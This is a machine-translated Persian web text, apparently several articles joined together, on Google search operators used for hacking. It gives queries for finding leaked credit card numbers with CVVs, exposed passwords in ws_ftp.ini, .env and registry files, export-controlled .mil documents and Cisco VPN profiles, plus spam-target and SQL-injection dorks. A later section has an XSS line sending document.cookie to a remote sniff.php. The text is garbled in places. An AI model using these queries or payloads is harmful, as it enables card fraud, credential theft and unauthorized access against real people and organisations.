    به طور پیش فرض، گوگل کلمات و به طور کلی هر کاراکتر وارد شده در تمام فایل های صفحات فهرست شده را جستجو می کند. می‌توانید دامنه جستجو را با دامنه سطح بالا، یک سایت خاص یا مکان دنباله مورد نظر در خود فایل‌ها محدود کنید. برای دو گزینه اول از عبارت site و به دنبال آن نام دامنه یا سایت انتخاب شده استفاده می شود. در مورد سوم، مجموعه کاملی از اپراتورها به شما امکان می دهد اطلاعات را در زمینه های خدمات و ابرداده جستجو کنید. به عنوان مثال، allinurl موارد مشخص شده را در بدنه خود پیوندها، allinanchor - در متن ارائه شده با برچسب پیدا می کند. ، allintitle - در سرصفحه های صفحه، allintext - در بدنه صفحات.

    برای هر اپراتور یک نسخه سبکتر با نام کوتاهتر (بدون پیشوند all) وجود دارد. تفاوت این است که allinurl پیوندها را با همه کلمات پیدا می کند، در حالی که inurl فقط با اولین آنها پیوندها را پیدا می کند. کلمات دوم و بعدی از پرس و جو می توانند در هر نقطه از صفحات وب ظاهر شوند. عملگر inurl نیز از نظر معنی - سایت با مشابه دیگر متفاوت است. اولین مورد همچنین به شما امکان می دهد هر دنباله ای از کاراکترها را در پیوند به سند مورد نظر پیدا کنید (به عنوان مثال /cgi-bin/) که به طور گسترده برای یافتن مؤلفه هایی با آسیب پذیری های شناخته شده استفاده می شود.

    بیایید آن را در عمل امتحان کنیم. فیلتر allintext را انتخاب می‌کنیم و درخواست فهرستی از شماره‌های کارت اعتباری و کدهای راستی‌آزمایی را برمی‌گردانیم که تنها پس از دو سال منقضی می‌شوند (یا زمانی که صاحبان آنها از تغذیه پشت سر هم همه خسته شوند).

    Allintext: تاریخ انقضا شماره کارت /2017 cvv

    وقتی در اخبار می خوانید که یک هکر جوان "به سرورهای" پنتاگون یا ناسا هک کرده و اطلاعات طبقه بندی شده را می دزدد، در بیشتر موارد دقیقاً این تکنیک ابتدایی استفاده از گوگل است. فرض کنید ما به لیستی از کارمندان ناسا و اطلاعات تماس آنها علاقه مند هستیم. مطمئناً چنین فهرستی به صورت الکترونیکی است. برای راحتی و یا به دلیل یک نادیده گرفتن، می تواند در وب سایت خود سازمان نیز قرار گیرد. منطقی است که در این مورد هیچ اشاره ای به آن وجود نخواهد داشت، زیرا برای استفاده داخلی در نظر گرفته شده است. چه کلماتی می تواند در چنین فایلی باشد؟ حداقل - فیلد "آدرس". آزمایش همه این فرضیات آسان است.


    inurl:nasa.gov نوع فایل:xlsx "آدرس"


    ما از بوروکراسی استفاده می کنیم

    چنین یافته هایی یک چیز کوچک دلپذیر است. جذب واقعاً قوی از دانش دقیق تر از اپراتورهای وب مستر گوگل، خود وب و ساختار چیزی که به دنبال آن هستید ناشی می شود. با دانستن جزئیات، می‌توانید به راحتی خروجی را فیلتر کرده و ویژگی‌های فایل‌های مورد نیاز خود را برای به دست آوردن داده‌های واقعا ارزشمند در بقیه اصلاح کنید. خنده دار است که بوروکراسی اینجا به کمک می آید. فرمول‌بندی‌های معمولی را تولید می‌کند که جستجوی اطلاعات محرمانه‌ای را که به طور تصادفی در وب منتشر شده است راحت می‌کند.

    به عنوان مثال، مهر بیانیه توزیع، که در دفتر وزارت دفاع ایالات متحده اجباری است، به معنای محدودیت های استاندارد در توزیع یک سند است. حرف A نشانه انتشار عمومی است که در آن هیچ چیز مخفی وجود ندارد. B - فقط برای استفاده داخلی در نظر گرفته شده است، C - کاملا محرمانه، و غیره تا F. به طور جداگانه، حرف X وجود دارد که اطلاعات ارزشمندی را نشان می دهد که نشان دهنده یک راز دولتی در بالاترین سطح است. اجازه دهید کسانی که قرار است این کار را در حین انجام وظیفه انجام دهند به دنبال چنین اسنادی بگردند و ما خود را به پرونده هایی با حرف C محدود می کنیم. طبق DoDI 5230.24، چنین علامت گذاری به اسنادی اختصاص داده می شود که حاوی شرح فناوری های حیاتی هستند که تحت کنترل صادرات هستند. شما می توانید چنین اطلاعاتی را که به دقت محافظت شده اند را در سایت هایی در دامنه سطح بالای .mil که به ارتش ایالات متحده اختصاص داده شده است بیابید.

    "بیانیه توزیع C" inurl:navy.mil

    بسیار راحت است که فقط سایت های وزارت دفاع ایالات متحده و سازمان های قراردادی آن در دامنه .mil جمع آوری شوند. نتایج جستجوی محدود به دامنه فوق العاده تمیز هستند و عناوین خود صحبت می کنند. جستجوی اسرار روسیه از این طریق عملاً بی فایده است: هرج و مرج در دامنه های .ru و .rf حاکم است و نام بسیاری از سیستم های تسلیحاتی مانند گیاه شناسی (PP "Kiparis"، اسلحه های خودکششی "Acacia") یا حتی به نظر می رسد. افسانه (TOS "پینوکیو").


    با بررسی دقیق هر سندی از یک سایت در دامنه .mil، می توانید نشانگرهای دیگری را برای اصلاح جستجوی خود مشاهده کنید. به عنوان مثال، اشاره به محدودیت های صادرات "Sec 2751"، که برای جستجوی اطلاعات فنی جالب نیز راحت است. هر از چند گاهی از سایت های رسمی حذف می شود، جایی که زمانی ظاهر می شد، بنابراین اگر نمی توانید پیوند جالبی را در نتایج جستجو دنبال کنید، از کش گوگل (اپراتور کش) یا وب سایت آرشیو اینترنت استفاده کنید.

    به ابرها صعود می کنیم

    علاوه بر اسنادی که به‌طور تصادفی از طبقه‌بندی خارج شده‌اند از ادارات دولتی، پیوندهایی به فایل‌های شخصی از Dropbox و سایر سرویس‌های ذخیره‌سازی داده که پیوندهای «خصوصی» به داده‌های منتشر شده عمومی ایجاد می‌کنند، گهگاه در حافظه پنهان Google ظاهر می‌شوند. حتی با خدمات جایگزین و خودساخته بدتر است. به عنوان مثال، کوئری زیر داده‌های تمامی کلاینت‌های Verizon را پیدا می‌کند که سرور FTP را نصب کرده و به طور فعال از روتر روی روتر خود استفاده می‌کنند.

    Allinurl:ftp://verizon.net

    در حال حاضر بیش از چهل هزار نفر از این افراد باهوش وجود دارند و در بهار 2015 مرتبه بزرگی بیشتری وجود داشت. به جای Verizon.net، می‌توانید نام هر ارائه‌دهنده معروفی را جایگزین کنید، و هر چه معروف‌تر باشد، اندازه‌گیری بزرگ‌تر می‌شود. از طریق سرور FTP داخلی، می توانید فایل ها را روی درایو خارجی متصل به روتر مشاهده کنید. معمولاً این یک NAS برای کار از راه دور، یک ابر شخصی یا نوعی دانلود فایل همتا به همتا است. تمام محتوای چنین رسانه هایی توسط گوگل و سایر موتورهای جستجو ایندکس می شود، بنابراین می توانید از طریق یک لینک مستقیم به فایل های ذخیره شده در درایوهای خارجی دسترسی داشته باشید.

    مشاهده تنظیمات

    قبل از انتقال عمده به ابرها، سرورهای FTP ساده، که فاقد آسیب‌پذیری بودند، به عنوان ذخیره‌سازی راه دور حکمفرما بودند. بسیاری از آنها هنوز هم مربوط به امروز هستند. به عنوان مثال، برنامه محبوب WS_FTP Professional داده های پیکربندی، حساب های کاربری و رمزهای عبور را در فایل ws_ftp.ini ذخیره می کند. یافتن و خواندن آن آسان است زیرا همه ورودی ها در متن ساده ذخیره می شوند و رمزهای عبور با استفاده از الگوریتم Triple DES پس از حداقل مبهم سازی رمزگذاری می شوند. در اکثر نسخه ها، صرفاً دور انداختن بایت اول کافی است.

    رمزگشایی چنین رمزهای عبور با استفاده از ابزار WS_FTP Password Decryptor یا یک سرویس وب رایگان آسان است.

    وقتی صحبت از هک کردن یک سایت دلخواه می شود، معمولاً به معنای دریافت رمز عبور از لاگ ها و پشتیبان گیری از CMS یا فایل های پیکربندی برنامه تجارت الکترونیک است. اگر ساختار معمولی آنها را بدانید، می توانید به راحتی کلمات کلیدی را مشخص کنید. خطوطی مانند خطوط موجود در ws_ftp.ini بسیار رایج هستند. به عنوان مثال، دروپال و پرستاشاپ همیشه یک شناسه کاربری (UID) و یک رمز عبور مربوطه (pwd) دارند و تمام اطلاعات در فایل هایی با پسوند inc ذخیره می شوند. می توانید آنها را به این صورت جستجو کنید:

    "pwd=" "UID=" ext:inc

    ما رمزهای عبور را از DBMS فاش می کنیم

    در فایل های پیکربندی سرورهای SQL، نام کاربری و آدرس ایمیل به صورت متن شفاف ذخیره می شود و به جای رمز عبور، هش MD5 آنها ثبت می شود. رمزگشایی آنها، به طور دقیق، غیرممکن است، اما شما می توانید در بین جفت های رمز عبور شناخته شده هش پیدا کنید.

    تاکنون DBMS هایی وجود دارند که حتی از هش رمز عبور نیز استفاده نمی کنند. فایل های پیکربندی هر یک از آنها را می توان به سادگی در مرورگر مشاهده کرد.

    Intext:DB_PASSWORD نوع فایل: env

    با ظهور سرورهای ویندوز، جای فایل های پیکربندی تا حدی توسط رجیستری گرفته شد. شما می توانید در شاخه های آن دقیقاً به همین روش جستجو کنید و از reg به عنوان نوع فایل استفاده کنید. به عنوان مثال، مانند این:

    نوع فایل:reg HKEY_CURRENT_USER "Password"=

    بدیهیات را فراموش نکنید

    گاهی اوقات می توان با کمک داده هایی که به طور تصادفی توسط گوگل باز شده و به دست می آید، به اطلاعات طبقه بندی شده دست یافت. گزینه ایده آل یافتن لیستی از رمزهای عبور در برخی از قالب های رایج است. فقط افراد ناامید می توانند اطلاعات حساب را در یک فایل متنی، یک سند Word یا یک صفحه گسترده اکسل ذخیره کنند، اما همیشه تعداد کافی از آنها وجود دارد.

    نوع فایل:xls inurl:password

    از یک سو ابزارهای زیادی برای جلوگیری از چنین حوادثی وجود دارد. باید حقوق دسترسی کافی در htaccess را مشخص کنید، CMS را وصله کنید، از اسکریپت های چپ استفاده نکنید و سوراخ های دیگر را ببندید. همچنین فایلی با فهرست حذف robots.txt وجود دارد که موتورهای جستجو را از فهرست کردن فایل ها و دایرکتوری های مشخص شده در آن منع می کند. از طرف دیگر، اگر ساختار robots.txt در برخی از سرورها با ساختار استاندارد متفاوت باشد، بلافاصله مشخص می شود که آنها سعی دارند چه چیزی را روی آن پنهان کنند.

    فهرست دایرکتوری‌ها و فایل‌ها در هر سایتی با نمایه استاندارد نوشته قبل از آن قرار می‌گیرد. از آنجایی که برای اهداف خدماتی باید در عنوان ظاهر شود، منطقی است که جستجوی آن را به عملگر intitle محدود کنیم. چیزهای جالبی را می توان در دایرکتوری های /admin/، /personal/، /etc/ و حتی /secret/ پیدا کرد.

    به روز رسانی ها را دنبال کنید

    ارتباط در اینجا بسیار مهم است: آسیب پذیری های قدیمی بسیار آهسته بسته می شوند، اما گوگل و نتایج جستجوی آن دائما در حال تغییر هستند. حتی بین فیلتر «ثانیه آخر» (&tbs=qdr:s در انتهای url درخواست) و فیلتر «زمان واقعی» (&tbs=qdr:1) تفاوت وجود دارد.

    فاصله زمانی آخرین تاریخ به‌روزرسانی فایل از Google نیز به طور ضمنی نشان داده شده است. از طریق رابط گرافیکی وب، می توانید یکی از دوره های معمول (ساعت، روز، هفته و غیره) را انتخاب کنید یا محدوده تاریخ را تعیین کنید، اما این روش برای اتوماسیون مناسب نیست.

    از ظاهر نوار آدرس، تنها می توان در مورد راهی برای محدود کردن خروجی نتایج با استفاده از ساختار &tbs=qdr: حدس زد. حرف y بعد از آن حد یک سال را مشخص می کند (&tbs=qdr:y)، m نتایج ماه گذشته، w برای هفته، d برای روز گذشته، h برای ساعت آخر، n برای دقیقه، و برای یک ثانیه به من بدهید. جدیدترین نتایجی که به تازگی در اختیار Google قرار گرفته است با استفاده از فیلتر &tbs=qdr:1 پیدا شده است.

    اگر نیاز به نوشتن یک اسکریپت پیچیده دارید، مفید خواهد بود که بدانید محدوده تاریخ در گوگل با فرمت Julian از طریق عملگر daterange تنظیم شده است. برای مثال، به این ترتیب می‌توانید فهرستی از اسناد PDF را با کلمه محرمانه که بین ۱ ژانویه تا ۱ ژوئیه ۲۰۱۵ آپلود شده‌اند، پیدا کنید.

    نوع فایل محرمانه: pdf daterange: 2457024-2457205

    محدوده در قالب تاریخ جولیان بدون اعشار مشخص شده است. ترجمه دستی آنها از تقویم میلادی ناخوشایند است. استفاده از مبدل تاریخ آسانتر است.

    هدف گذاری و دوباره فیلتر کردن

    علاوه بر مشخص کردن اپراتورهای اضافی در جست‌وجو، می‌توان آنها را مستقیماً در متن پیوند ارسال کرد. برای مثال، ویژگی filetype:pdf با ساختار as_filetype=pdf مطابقت دارد. بنابراین، تنظیم هر گونه توضیح راحت است. بیایید بگوییم که خروجی نتایج فقط از جمهوری هندوراس با افزودن ساختار cr=countryHN به URL جستجو تنظیم می شود، اما فقط از شهر Bobruisk - gcs=Bobruisk . برای لیست کاملی از بخش توسعه دهندگان را ببینید.

    ابزارهای اتوماسیون گوگل برای آسان‌تر کردن زندگی طراحی شده‌اند، اما اغلب به دردسر می‌افزایند. به عنوان مثال، شهر یک کاربر توسط IP کاربر از طریق WHOIS تعیین می شود. بر اساس این اطلاعات، گوگل نه تنها بار بین سرورها را متعادل می کند، بلکه نتایج جستجو را نیز تغییر می دهد. بسته به منطقه، برای همان پرس و جو، نتایج متفاوتی به صفحه اول می رسد و ممکن است برخی از آنها کاملاً پنهان شوند. مانند یک جهان وطن احساس کنید و جستجوی اطلاعات از هر کشوری به کد دو حرفی آن بعد از دستورالعمل gl=country کمک می کند. به عنوان مثال، کد هلند NL است، در حالی که واتیکان و کره شمالی کد خود را در گوگل ندارند.

    اغلب نتایج جستجو حتی پس از استفاده از چند فیلتر پیشرفته نیز پر از آب می شوند. در این مورد، به راحتی می توان پرس و جو را با افزودن چند کلمه استثنا به آن اصلاح کرد (هر کدام با علامت منهای قبل از هر کدام). به عنوان مثال، بانکداری، نام ها و آموزش اغلب با کلمه Personal استفاده می شود. بنابراین، نتایج جستجوی تمیزتر نه یک نمونه کتاب درسی از یک پرس و جو، بلکه یک نمونه تصفیه شده را نشان می دهد:

    عنوان:"شاخص /شخصی/" -نام ها -آموزش -بانکداری

    آخرین مثال

    یک هکر پیشرفته با این واقعیت متمایز می شود که هر آنچه را که نیاز دارد به تنهایی برای خود فراهم می کند. به عنوان مثال، VPN یک چیز راحت است، اما گران است یا موقت و با محدودیت. ثبت نام برای خودتان به تنهایی بسیار گران است. خوب است که اشتراک های گروهی وجود دارد و با کمک گوگل می توان به راحتی عضو یک گروه شد. برای انجام این کار، فقط فایل پیکربندی Cisco VPN را پیدا کنید که دارای پسوند PCF نسبتاً غیر استاندارد و یک مسیر قابل تشخیص است: Program Files\Cisco Systems\VPN Client\Profiles. یک درخواست، و شما برای مثال به کارکنان دوستانه دانشگاه بن بپیوندید.

    نوع فایل: pcf vpn OR Group

    اطلاعات

    گوگل فایل های پیکربندی را با رمزهای عبور پیدا می کند، اما بسیاری از آنها رمزگذاری شده یا با هش جایگزین شده اند. اگر رشته هایی با طول ثابت مشاهده کردید، فوراً به دنبال یک سرویس رمزگشایی باشید.

    رمزهای عبور به صورت رمزگذاری شده ذخیره می شوند، اما موریس ماسارد قبلاً برنامه ای برای رمزگشایی آنها نوشته است و آن را به صورت رایگان از طریق thecampusgeeks.com ارائه می دهد.

    با کمک گوگل صدها نوع مختلف حمله و تست نفوذ انجام می شود. گزینه های زیادی وجود دارد که بر برنامه های محبوب، فرمت های اصلی پایگاه داده، آسیب پذیری های متعدد PHP، ابرها و غیره تأثیر می گذارد. دانستن اینکه دقیقاً به دنبال چه چیزی هستید، به دست آوردن اطلاعات مورد نیاز (مخصوصاً اطلاعاتی که قصد عمومی کردن آن را نداشتید) بسیار آسان تر می کند. نه تنها Shodan ایده های جالب را تغذیه می کند، بلکه هر پایگاه داده ای از منابع شبکه فهرست شده را ارائه می دهد!

    نحوه جستجو با استفاده از google.com

    احتمالاً همه می دانند که چگونه از موتور جستجویی مانند گوگل استفاده کنند =) اما همه نمی دانند که اگر یک عبارت جستجو را به درستی با استفاده از ساختارهای خاص بنویسید، می توانید نتایج مورد نظر خود را بسیار کارآمدتر و سریعتر به دست آورید =) در این مقاله من سعی خواهم کرد نشان دهم که چگونه باید برای جستجوی صحیح انجام دهید

    Google از چندین اپراتور جستجوی پیشرفته پشتیبانی می کند که هنگام جستجو در google.com معنای خاصی دارند. به طور معمول، این اپراتورها جستجو را تغییر می دهند، یا حتی به گوگل می گویند که انواع مختلف جستجو را انجام دهد. به عنوان مثال، طراحی ارتباط دادن:یک اپراتور ویژه است و پرس و جو لینک: www.google.comبه شما یک جستجوی معمولی نمی دهد، اما در عوض تمام صفحات وب را که پیوندهایی به google.com دارند پیدا می کند.
    انواع درخواست جایگزین

    حافظه پنهان:اگر کلمات دیگری را در پرس و جو وارد کنید، Google کلمات موجود در سند ذخیره شده را برجسته می کند.
    مثلا، کش: www.webمحتوای ذخیره شده را با کلمه "وب" برجسته نشان می دهد.

    ارتباط دادن:عبارت جستجوی بالا صفحات وبی را نشان می دهد که حاوی پیوندهایی به پرس و جوی مشخص شده هستند.
    مثلا: لینک:www.websiteتمام صفحاتی که دارای پیوند به http://www.site هستند نمایش داده می شود

    مربوط:صفحات وب را نشان می دهد که "مربوط" به صفحه وب مشخص شده هستند.
    مثلا، مرتبط: www.google.comصفحات وب مشابه صفحه اصلی گوگل را فهرست می کند.

    اطلاعات:اطلاعات درخواستی: اطلاعاتی را که گوگل در مورد صفحه وب درخواستی دارد ارائه می دهد.
    مثلا، اطلاعات: وب سایتاطلاعاتی در مورد انجمن ما نشان می دهد =) (Armada - انجمن وب مسترهای بزرگسال).

    سایر درخواست های اطلاعاتی

    تعريف كردن:پرس و جو define: تعریفی از کلماتی که بعد از این تایپ می کنید را ارائه می دهد که از منابع مختلف آنلاین جمع آوری شده است. این تعریف برای کل عبارت وارد شده خواهد بود (یعنی شامل تمام کلمات در عبارت جستجوی دقیق می شود).

    سهام:اگر یک پرس و جو را با سهام شروع کنید: Google بقیه عبارات پرس و جو را به عنوان نشانه های سهام تلقی می کند و به صفحه ای پیوند می دهد که اطلاعات آماده شده برای آن شخصیت ها را نشان می دهد.
    مثلا، سهام: اینتل یاهواطلاعاتی در مورد اینتل و یاهو نشان خواهد داد. (توجه داشته باشید که باید کاراکترهای اخبار فوری را چاپ کنید، نه نام شرکت)

    درخواست اصلاح کننده ها

    سایت:اگر سایت: را در جستجوی خود قرار دهید، گوگل نتایج را به وب سایت هایی که در آن دامنه پیدا می کند محدود می کند.
    همچنین می توانید مناطق جداگانه مانند ru، org، com و غیره را جستجو کنید ( سایت: کام سایت:ru)

    allintitle:اگر یک پرس و جو با allintitle: اجرا کنید، گوگل نتایج را با تمام کلمات جستجو در عنوان محدود می کند.
    مثلا، allintitle: جستجو در گوگلتمام صفحات جستجوی گوگل مانند تصاویر، وبلاگ و غیره را برمی گرداند

    عنوان:اگر intitle: را در جستار خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در عنوان هستند محدود می کند.
    مثلا، عنوان: کسب و کار

    آلینورل:اگر درخواستی را با allinurl اجرا کنید: Google نتایج را با تمام کلمات جستجو در URL محدود می کند.
    مثلا، allinurl: جستجو در گوگلاسناد را با گوگل برمی گرداند و در عنوان جستجو می کند. همچنین، به عنوان یک گزینه، می توانید کلمات را با علامت (/) جدا کنید، سپس کلمات دو طرف اسلش در همان صفحه جستجو می شوند: مثال allinurl: foo/bar

    inurl:اگر inurl: را در جستجوی خود قرار دهید، Google نتایج را به اسنادی که حاوی آن کلمه در URL هستند محدود می کند.
    مثلا، انیمیشن inurl:website

    در متن:فقط در متن صفحه برای کلمه مشخص شده جستجو می کند، بدون توجه به عنوان و متون پیوندها، و موارد غیر مرتبط با آن. همچنین یک مشتق از این اصلاح کننده وجود دارد - allintext:آن ها علاوه بر این، تمام کلمات در پرس و جو فقط در متن جستجو می شوند، که این نیز مهم است، و کلمات پرکاربرد در پیوندها را نادیده می گیرند.
    مثلا، intext: انجمن

    محدوده زمانی:جستجو در بازه های زمانی (daterange: 2452389-2452389)، تاریخ ها برای زمان در قالب جولیان مشخص شده است.

    خوب، و انواع نمونه های جالب از درخواست ها

    نمونه هایی از کامپایل پرس و جو برای گوگل. برای اسپمرها

    inurl:control.guest?a=sign

    Site:books.dreambook.com "URL صفحه اصلی" "Sign my" inurl:sign

    سایت: www.freegb.net صفحه اصلی

    Inurl:sign.asp "تعداد کاراکترها"

    "پیام:" inurl:sign.cfm "فرستنده:"

    inurl:register.php "ثبت کاربر" "وب سایت"

    Inurl:edu/کتاب مهمان «کتاب مهمان را امضا کنید»

    Inurl: ارسال "پست نظر" "URL"

    Inurl:/archives/ "Comments:" "اطلاعات را به خاطر دارید؟"

    "اسکریپت و کتاب مهمان ایجاد شده توسط:" "URL:" "نظرات:"

    inurl:?action=add "phpBook" "URL"

    عنوان: "ارسال داستان جدید"

    مجلات

    inurl:www.livejournal.com/users/mode=reply

    inurl greatestjournal.com/mode=reply

    Inurl:fastbb.ru/re.pl؟

    inurl:fastbb.ru /re.pl؟ "کتاب مهمان"

    وبلاگ ها

    Inurl:blogger.com/comment.g?”postID””ناشناس”

    Inurl:typepad.com/ "یک نظر ارسال کنید" "اطلاعات شخصی را به خاطر دارید؟"

    Inurl:greatestjournal.com/community/ "ارسال نظر" "آدرس پوسترهای ناشناس"

    "پست نظر" "آدرس پوسترهای ناشناس" -

    عنوان: ارسال نظر

    Inurl:pirillo.com "ارسال نظر"

    انجمن ها

    Inurl:gate.html?”name=Forums” “mode=reply”

    inurl:”forum/posting.php?mode=reply”

    inurl:”mes.php?”

    inurl:”members.html”

    inurl:forum/memberlist.php؟"

    تصمیم گرفتم کمی در مورد امنیت اطلاعات صحبت کنم. این مقاله برای برنامه نویسان تازه کار و کسانی که به تازگی توسعه Frontend را شروع کرده اند مفید خواهد بود. مشکل چیه؟

    بسیاری از توسعه دهندگان تازه کار آنقدر به نوشتن کد معتاد هستند که امنیت کار خود را کاملا فراموش می کنند. و مهمتر از همه، آنها آسیب پذیری هایی مانند SQL query، XXS را فراموش می کنند. آنها همچنین رمزهای عبور آسانی را برای پنل های اداری خود ارائه می دهند و در معرض زور وحشیانه قرار می گیرند. این حملات چیست و چگونه می توان از آنها جلوگیری کرد؟

    تزریق SQL

    تزریق SQL رایج ترین نوع حمله به پایگاه داده است که با پرس و جوی SQL برای یک DBMS خاص انجام می شود. بسیاری از مردم و حتی شرکت های بزرگ از چنین حملاتی رنج می برند. دلیل آن اشتباه توسعه دهنده هنگام نوشتن پایگاه داده و در واقع پرس و جوهای SQL است.

    یک حمله از نوع تزریق SQL به دلیل پردازش نادرست داده های ورودی مورد استفاده در پرس و جوهای SQL امکان پذیر است. با حمله موفقیت آمیز یک هکر، نه تنها محتویات پایگاه های داده، بلکه به ترتیب رمز عبور و گزارش های پنل مدیریتی را نیز از دست خواهید داد. و این داده ها برای تصاحب کامل سایت یا انجام تنظیمات برگشت ناپذیر در آن کاملاً کافی خواهد بود.

    این حمله را می توان با موفقیت در اسکریپت های نوشته شده در PHP، ASP، Perl و زبان های دیگر بازتولید کرد. موفقیت چنین حملاتی بیشتر به این بستگی دارد که از کدام DBMS استفاده می شود و خود سناریو چگونه پیاده سازی می شود. سایت های آسیب پذیر زیادی برای تزریق SQL در دنیا وجود دارد. این به راحتی قابل تأیید است. کافی است وارد "dorks" شوید - اینها درخواست های ویژه ای برای یافتن سایت های آسیب پذیر هستند. در اینجا به برخی از آنها اشاره می کنیم:

    • inurl:index.php?id=
    • inurl:trainers.php?id=
    • inurl:buy.php?category=
    • inurl:article.php?ID=
    • inurl:play_old.php?id=
    • inurl:declaration_more.php?decl_id=
    • inurl:pageid=
    • inurl:games.php?id=
    • inurl:page.php?file=
    • inurl:newsDetail.php?id=
    • inurl:gallery.php?id=
    • inurl:article.php?id=

    چگونه از آنها استفاده کنیم؟ کافی است آنها را در موتور جستجوی Google یا Yandex وارد کنید. موتور جستجو نه تنها یک سایت آسیب پذیر، بلکه صفحه ای برای این آسیب پذیری در اختیار شما قرار می دهد. اما ما به همین جا بسنده نمی کنیم و مطمئن می شویم که صفحه واقعاً آسیب پذیر است. برای این کار کافی است یک نقل قول “‘” بعد از مقدار “id=1” قرار دهید. چیزی شبیه به این:

    • inurl:games.php?id=1'

    و سایت یک خطا در مورد پرس و جو SQL به ما می دهد. هکر ما در مرحله بعد به چه چیزی نیاز دارد؟

    و سپس او به همین پیوند به صفحه با خطا نیاز دارد. سپس کار بر روی آسیب پذیری در اکثر موارد در توزیع "Kali linux" با ابزارهای آن برای این بخش انجام می شود: معرفی کد تزریق و انجام عملیات لازم. چگونه این اتفاق خواهد افتاد، نمی توانم به شما بگویم. اما می توانید اطلاعاتی در این مورد در اینترنت پیدا کنید.

    حمله XSS

    این نوع حمله روی کوکی ها انجام می شود. آنها به نوبه خود علاقه زیادی به نجات کاربران دارند. چرا که نه؟ بدون آنها چطور؟ از این گذشته ، به لطف کوکی ها ، ما صد بار رمز عبور را از Vk.com یا Mail.ru وارد نمی کنیم. و تعداد کمی هستند که آنها را رد کنند. اما در اینترنت، اغلب برای هکرها یک قانون ظاهر می شود: ضریب راحتی مستقیماً با ضریب ناامنی متناسب است.

    برای اجرای یک حمله XSS، هکر ما به دانش جاوا اسکریپت نیاز دارد. این زبان در نگاه اول بسیار ساده و بی ضرر است، زیرا به منابع کامپیوتری دسترسی ندارد. یک هکر فقط در مرورگر می تواند با جاوا اسکریپت کار کند، اما همین کافی است. پس از همه، نکته اصلی این است که کد را وارد صفحه وب کنید.

    من به جزئیات در مورد روند حمله نمی پردازم. من فقط اصول اولیه و معنای چگونگی این اتفاق را خواهم گفت.

    یک هکر می تواند کد JS را به برخی از انجمن ها یا کتاب مهمان اضافه کند:

    اسکریپت‌ها ما را به صفحه‌ای آلوده هدایت می‌کنند که در آن کد اجرا می‌شود: خواه یک sniffer، نوعی ذخیره‌سازی یا یک سوء استفاده که به نوعی کوکی‌های ما را از حافظه پنهان می‌دزدد.

    چرا جاوا اسکریپت؟ زیرا جاوا اسکریپت با درخواست های وب عالی است و به کوکی ها دسترسی دارد. اما اگر اسکریپت ما را به سایتی منتقل کند، کاربر به راحتی متوجه این موضوع می شود. در اینجا، هکر از گزینه حیله گرتری استفاده می کند - او به سادگی کد را در تصویر وارد می کند.

    Img=newImage();

    Img.src=” http://192.168.1.7/sniff.php?”+document.cookie;

    ما به سادگی یک تصویر ایجاد می کنیم و اسکریپت خود را به عنوان یک آدرس به آن اختصاص می دهیم.

    چگونه از خود در برابر این همه محافظت کنید؟ بسیار ساده - پیوندهای مشکوک را دنبال نکنید.

    حملات DoS و DDos


    DoS (از انگلیسی Denial of Service - انکار سرویس یک حمله هکری به یک سیستم کامپیوتری با هدف شکست آن است. این ایجاد شرایطی است که در آن کاربران وظیفه شناس سیستم نتوانند به منابع (سرور) سیستم ارائه شده دسترسی داشته باشند و یا این دسترسی مشکل باشد. اگر در شرایط اضطراری، نرم افزار اطلاعات مهمی را ارائه دهد، مانند نسخه، بخشی از کد برنامه، و غیره، خرابی سیستم می تواند گامی در جهت گرفتن آن باشد. اما اغلب این یک معیار است فشار اقتصادی: از دست دادن یک سرویس ساده که درآمد ایجاد می کند. صورت‌حساب‌های ارائه‌دهنده یا اقداماتی برای جلوگیری از حمله به طور قابل‌توجهی به "هدف" در جیب ضربه می‌زند. در حال حاضر، حملات DoS و DDoS محبوب‌ترین هستند، زیرا به شما این امکان را می‌دهند که تقریباً هر سیستمی را بدون به جا گذاشتن شواهد مهم قانونی به شکست بکشانید.

    تفاوت بین حملات DoS و DDos چیست؟

    DoS یک حمله است که به روشی هوشمند ساخته شده است. به عنوان مثال، اگر سرور صحت بسته های دریافتی را بررسی نکند، یک هکر می تواند چنین درخواستی را ارائه دهد که برای همیشه پردازش می شود و زمان پردازشگر کافی برای کار با سایر اتصالات وجود نخواهد داشت. بر این اساس، مشتریان انکار خدمات دریافت خواهند کرد. اما بارگذاری بیش از حد یا غیرفعال کردن سایت های شناخته شده بزرگ به این روش کارساز نخواهد بود. آنها مجهز به کانال های نسبتاً گسترده و سرورهای فوق العاده قدرتمند هستند که به راحتی می توانند با چنین بار اضافی کنار بیایند.

    DDoS در واقع همان حمله DoS است. اما اگر در DoS یک بسته درخواست وجود داشته باشد، در DDoS ممکن است صدها یا بیشتر از آنها وجود داشته باشد. حتی سرورهای سنگین ممکن است نتوانند با چنین بار اضافی کنار بیایند. من برای شما یک مثال می زنم.

    حمله DoS زمانی است که شما در حال مکالمه با شخصی هستید، اما یک فرد بد اخلاق می آید و با صدای بلند شروع به فریاد زدن می کند. صحبت کردن یا غیرممکن است یا بسیار دشوار. راه حل: با امنیت تماس بگیرید که باعث آرامش و خروج فرد از اتاق می شود. حملات DDoS زمانی اتفاق می‌افتد که هزاران نفر از این افراد بد اخلاق وارد آن شوند. در این صورت نگهبانان نمی توانند همه را بپیچانند و با خود ببرند.

    DoS و DDoS از رایانه‌هایی تولید می‌شوند که به اصطلاح زامبی‌ها هستند. اینها رایانه‌های کاربرانی هستند که توسط هکرها هک شده‌اند و حتی گمان نمی‌کنند که دستگاهشان در حمله به هیچ سروری نقش داشته باشد.

    چگونه از خود در برابر این محافظت کنید؟ به طور کلی، به هیچ وجه. اما شما می توانید کار یک هکر را پیچیده کنید. برای این کار باید یک هاست خوب با سرورهای قدرتمند انتخاب کنید.

    حمله بی رحمانه

    یک توسعه‌دهنده می‌تواند سیستم‌های حفاظت از حمله زیادی را ارائه کند، اسکریپت‌هایی که نوشته‌ایم را به طور کامل بررسی کند، سایت را برای آسیب‌پذیری‌ها بررسی کند و غیره. اما وقتی نوبت به آخرین مرحله طرح‌بندی سایت می‌رسد، یعنی زمانی که فقط یک رمز عبور در پنل مدیریت قرار می‌دهد، او می‌تواند یک چیز را فراموش کند. کلمه عبور!

    اکیداً توصیه نمی شود که یک رمز عبور ساده تنظیم کنید. می تواند 12345، 1114457، vasya111 و غیره باشد. توصیه نمی شود رمزهای عبور کمتر از 10-11 کاراکتر تنظیم کنید. در غیر این صورت، ممکن است در معرض رایج ترین و نه پیچیده ترین حمله - Brute Force قرار بگیرید.

